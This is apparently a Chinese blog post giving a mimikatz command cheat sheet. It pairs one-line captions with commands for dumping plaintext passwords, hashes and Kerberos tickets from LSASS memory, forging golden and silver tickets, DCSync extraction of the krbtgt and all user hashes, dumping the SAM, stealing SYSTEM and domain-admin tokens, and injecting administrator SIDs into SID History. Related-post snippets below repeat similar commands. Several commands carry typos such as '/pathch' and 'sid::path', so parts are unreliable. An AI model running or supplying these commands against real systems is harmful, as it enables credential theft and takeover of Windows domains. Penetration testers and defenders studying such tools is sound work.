mimikatz使用

最新推荐文章于 2024-05-12 13:02:42 发布
最新推荐文章于 2024-05-12 13:02:42 发布
阅读量385 收藏 3
点赞数
分类专栏: 域安全 文章标签: 安全漏洞 信息安全 系统安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/129116428
版权
mimikatz简介
mimikatz可以从机器内存中提取/明文密码/密码Hash/PIN码/Kerberos票据/等。
mimikatz模块介绍
crypto					加密模块
sekurlsa				SekurLSA模块,用来枚举凭据
kerberos				Kerberos包模块
ngc						密码学模块
privilege				提权
process					进程模块
service					服务模块
lsadump					LsaDump模块
ts						终端服务器模块
event					事件模块
misc					杂项模块
token					令牌操作模块
vault					Windows凭据模块
minesweeper				MinSweeper模块
dpapi					DPAPI模块(通过API或RAW访问,数据保护应用程序编程接口)
busylight				BusyLigh模块
sysenv					系统环境值模块
sid						安全标识符模块
iis						IIS XML 配置模块
rpc						RPC控制
sr98					SR98设备和T5577目标模块
rdm						RDM(830AL)设备的射频模块
acr						ACR模块
常见模块的有privilege/sekurlsa/kerberos/lsadump/token/sid
privilege模块
该模块主要用于提权需要管理员身份员运行才可进行提权。
privilege::debug
sekurlsa模块
主要用于枚举凭据的命令,需要高权限运行所以需要显示privilege模块提权。+
抓取内存中保存用户明文密码
sekurlsa::wdigest
抓取内存中保存的用户Hash
sekurlsa::msv
抓取内存中保存用户密码的Key值
sekurlsa::ekeys
抓取内存中保存的用户所有凭据
sekurlsa::logonpasswords
加载dump文件并导出其中的明文密码
sekurlsa::minidump lsass.dump
sekurlsa::logonpasswords full
导出lsass.exe进程中所有的票据
sekurlsa::tickets /export
kerberos模块
查看内存中的Kerberos TGT
kerberos::tgt
查看内存中所有的Kerberos票据
kerberos::list
清除票据
kerberos::purge
将票据注入到内存中
kerberos::ptt xx.kirbi
黄金票据传递攻击
kerberos::golden /user:要伪造的域用户 /domain:域名 /sid:域的sid值 /krbtgt:krbtgt的hash或是AES Key /ptt
白银票据传递攻击
kerberos::golden /user:要伪造的用户 /domain:域名 /sid:域的sid值 /target:服务机器 /service:指定服务,如cifs/ldap /rc4:服务账号的Hash /ptt
lsadump模块
该模块是对Local Security Authority(LSA)进行密码抓取的模块。
通过DCSync导出指定用户密码Hash格式化输出
lsadump::dcsync /domain:test.com /user:krbtgt /csv
通过DCsync导出指定用户的密码Hash的详细信息
lsadump::dcsync /domain:test.com /user:krbtgt 
通过DCsync导出所有用户的Hash
lsadump::dcsync /domain:test.com /all /csv
读取所有用户的Hash,需要域控上以管理员权限运行
lsadump::lsa /pathch
从sam.hive和system.hive文件中获得NTLM Hash
reg save hklm\sam sam.hive
reg save hklm\system system.hive
lsadump::sam /sam:sam.hive /system:system.hive
从本地SAM文件中读取密码Hash
token::elevate
lsadump::sam
token模块
该模块是访问令牌相关的模块
列出当前进程的token信息
token::whoami
token::whoami /full
列出当前系统中存在的token,高权限列出的token最全
token::list
窃取指定的token id的token
token::elevate id 
窃取System权限的token(默认)
token::elevate /system
窃取域管理员的token
token::elevate /domain
窃取企业管理员的token
token::elevate /enterpriseadmin
窃取本地管理员的token
token::elevate /admin
窃取Local Service权限的token
token::elevate /localservice
窃取Network Service权限的token
token::elevate /networkservice
恢复之前的token
token::revert
sid模块
该模块是SID相关的模块
查询指定对象的SID
sid::lookup /name:test

在这里插入图片描述

查询指定SID对应的对象
sid::lookup /sid:S-1-5-21-2691333271-3572924591-1293602303

在这里插入图片描述

通过samAccountName属性查询对象的信息
sid::query /sam:test
通过SID属性查询对象的信息
sid::query /sid:S-1-5-21-2691333271-3572924591-1293602303
通过 samAccountName 属性修改对象的 SID
sid::patch
sid::modify /sam:test /new:S-1-5-21-2691333271-3572924591-1293602303
通过sid属性修改对象的 SID
sid::patch
sid::modify /sid:S-1-5-21-2691333271-3572924591-1293602303 /newsid::patch:S-1-5-21-2691333271-3572924591-1293602304
通过 samAccountName 属性给对象添加一个SID History属性
sid::patch
sid::add /sam;test /new:S-1-5-21-2691333271-3572924591-1293602303
通过sid属性给对象添加一个SID History属性
sid::patch
sid::add /sid:S-1-5-21-2691333271-3572924591-1293602303 /new:S-1-5-21-2691333271-3572924591-1293602303-500
将administrator的SID 添加到 test的SID History 属性中
sid::path
sid::add /sam:test /new:administrator
清除指定samAccountName对象的SID Historty属性
sid::clear /sam::test
清除指定sid对象SID History属性
sid::clear /sid:S-1-5-21-2691333271-3572924591-1293602303
虚构之人
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Mimikatz获取系统密码攻防研究
weixin_44023460的博客
06-23 4443
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为Win32位(多了一个mimilove.exe文件)和X64位。通过它们可以提升进程权限、注
windows内存密码获取mimikatz_trunk
04-17
第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20180325
2024年网络安全最全内网渗透神器(Mimikatz)——使用教程,2024年最新当上项目经理才知道
最新发布
2401_84267585的博客
05-12 1817
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。
内网渗透神器(Mimikatz)——使用教程
热门推荐
W小哥
04-16 6万+
一、工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 二、Mimikatz命令 cls: 清屏 standard: 标准模块,基本命令 crypto: 加密相关模块 sekurlsa: 与证书相关的模块 kerberos: kerberos模块 privilege: 提权相关模块 process: 进程相关
Mimikatz-内存中的SSP
weixin_45682070的博客
06-25 407
首先说一下SSP,安全支持提供程序(SSP)是Windows API,用于扩展Windows身份验证机制。LSASS进程正在Windows启动期间加载安全支持提供程序DLL。这种行为使红队的攻击者可以删除一个任意的SSP DLL以便与LSASS进程进行交互并记录该进程中存储的所有密码,或者直接用恶意的SSP对该进程进行修补而无需接触磁盘。 该技术需要管理员权限,可用于收集系统的凭证,这里用mimikatz介绍两种,一种是 注册SSP DLL ,二种是 加载到内存 注册SSP DLL Mimikatz压缩包中
Mimikatz使用方法
她叫常玉莹
08-21 1万+
Mimikatz命令抓取明文密码模块sekurlsa模块kerberos模块lsadump模块WDigestLSA保护获取高版本Windows系统的密码凭证msf中kiwi模块kiwi模块使用kiwi模块命令creds_allkiwi_cmd Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。 Mimikatz命令 cls:清屏 standa..
mimikatz常见命令
G3et的博客
01-29 1449
Mimikatz 是一款用于提取 Windows 系统中用户凭据(例如用户名和密码哈希)的开源工具。它可以在不破坏凭据的情况下轻松访问和使用这些凭据。可以被用于攻击域控制器、服务器和客户端机器,从而获得更多权限并执行恶意操作。
[后渗透]Mimikatz使用大全1
08-03
【后渗透技术】Mimikatz使用详解 Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统权限提升、密码获取和安全审计。它以其强大的功能在网络安全领域广受欢迎,特别是在渗透测试和红队操作...
mimikatz最新版本
11-20
`README.md`是Markdown格式的说明文档,通常会包含项目简介、使用方法、更新日志等信息,是理解mimikatz使用的关键。`kiwi_passwords.yar`可能是一个规则文件,用于特定类型的密码或哈希解析。最后,`Win32`和`x64`...
mimikatz.rar
07-08
本文将详细介绍mimikatz的功能、用途以及如何使用mimikatz的核心功能之一,就是可以从lsass.exe进程中提取Windows系统的明文密码。lsass.exe是Local Security Authority Subsystem Service的缩写,是Windows操作...
mimikatz获取系统密码
03-28
2. **法律与道德**: 使用mimikatz必须遵守当地法律法规,确保在授权的范围内进行,否则可能触犯法律。 3. **防护措施**: 对于系统管理员来说,了解mimikatz的工作原理有助于增强系统的防御策略,如限制不必要的权限...
纯Python中的Mimikatz实现-Python开发
05-25
pypykatz在纯Python中的Mimikatz实现。 至少有一部分:)在所有支持python> = 3.6 WIKI的操作系统上运行。从版本0.1.1开始,命令行有所更改。 不用担心,我在纯Python中有一个很棒的WIKI fo pypykatz Mimikatz实现。 至少有一部分:)在所有支持python> = 3.6 WIKI的操作系统上运行。从版本0.1.1开始,命令行有所更改。 不用担心,我有一个很棒的维基百科。 安装通过pip或从github克隆来安装它。 安装程序将在python的Script目录中创建pypykatz可执行文件。 您可以从那里运行它,应该在您的PATH中。 保重,因为我要打公关,所以github主版本可能会失败
Python-用于解析包含Mimikatz输出的txt文件的Python脚本
08-10
用于解析包含Mimikatz输出的txt文件的Python脚本
mimikatz 2.1
04-01
法国神器 最新版本2.1 2016年2月17号版本。
Python-pypykatz是Mimikatz的纯Python实现
08-10
pypykatz:是Mimikatz的纯Python实现
mimikatz-master源码
07-22
mimikatz-master
mimikatz的基本使用
a3320315的博客
05-25 9762
常见命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system::user-----查看当前登录的系统用户 system::computer-------查看计算机名称 process::list------------------列出进程 process::suspend 进程名称 -----暂停进程 process::stop 进程名称--
volatility安装+插件安装(mimikatz
sbingmo的博客
07-11 1万+
volatility安装+插件安装(mimikatz
内网渗透之内网信息收集(五)
不知名白帽的博客
07-06 1240
内网渗透之内网信息收集(五)(01凭证获取工具、02密码hash、03mimikatz、04get-hashs)
kali 中mimikatz使用教程
06-28
这是一个对于使用 Mimikatz 工具的教程。 Mimikatz 是一个开发者用来获取 Windows 认证凭证的工具,它可以解密 Windows 存储的密码,甚至可以获取经过 NTLM 身份验证的密码。 但请注意,使用这个工具可能会涉及到...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值